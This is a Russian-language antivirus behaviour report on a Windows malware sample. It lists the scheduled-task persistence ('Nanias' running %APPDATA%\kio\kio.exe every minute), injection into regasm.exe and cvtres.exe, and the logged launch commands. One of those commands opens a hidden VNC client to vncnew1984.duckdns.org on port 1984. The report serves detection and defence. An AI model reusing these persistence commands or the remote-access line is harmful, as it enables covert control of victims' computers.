Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\createexplorershellunelevatedtask
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\<Имя файла>.exe.log
- %APPDATA%\kio\kio.exe
Другое
Ищет следующие окна
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Proxy Desktop' WindowName: ''
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
- '%WINDIR%\explorer.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' Client vncnew1984.duckdns.org 1984 ecZCILAfG (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c mkdir "%APPDATA%\kio"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'%APPDATA%\kio\kio.exe'" /f
- '%WINDIR%\syswow64\cmd.exe' /c copy "<Полный путь к файлу>" "%APPDATA%\kio\kio.exe"
- '%WINDIR%\explorer.exe' /NOUACCHECK
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn "Nanias" /tr "'%APPDATA%\kio\kio.exe'" /f
